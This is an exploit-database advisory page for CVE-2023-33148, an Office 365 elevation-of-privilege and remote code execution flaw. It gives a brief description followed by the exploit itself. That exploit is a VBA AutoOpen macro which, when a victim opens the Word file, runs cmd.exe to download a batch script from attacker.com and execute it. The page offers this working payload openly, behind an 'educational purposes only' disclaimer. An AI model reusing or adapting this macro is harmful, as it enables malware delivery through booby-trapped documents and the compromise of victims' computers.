Microsoft office 365 version 18.2305.1222.0 elevation of privilege + rce. Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2023-07-20 |
Type : remote |
Platform : multiple
This exploit / vulnerability Microsoft office 365 version 18.2305.1222.0 elevation of privilege + rce. is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
## Title: Microsoft Office 365 Version 18.2305.1222.0 - Elevation of Privilege + RCE.
## Author: nu11secur1ty
## Date: 07.18.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/microsoft-365/microsoft-office
## Reference: https://portswigger.net/web-security/access-control
## CVE-2023-33148
## Description:
The Microsoft Office 365 Version 18.2305.1222.0 app is vulnerable to
Elevation of Privilege.
The attacker can use this vulnerability to attach a very malicious
WORD file in the Outlook app which is a part of Microsoft Office 365
and easily can trick the victim to click on it - opening it and
executing a very dangerous shell command, in the background of the
local PC. This execution is without downloading this malicious file,
and this is a potential problem and a very dangerous case! This can be
the end of the victim's PC, it depends on the scenario.
## Staus: HIGH Vulnerability
[+]Exploit:
- Exploit Server:
```vb
Sub AutoOpen()
Call Shell("cmd.exe /S /c" & "curl -s
https://attacker.com/uqev/namaikitiputkata/golemui.bat > salaries.bat
&& .\salaries.bat", vbNormalFocus)
End Sub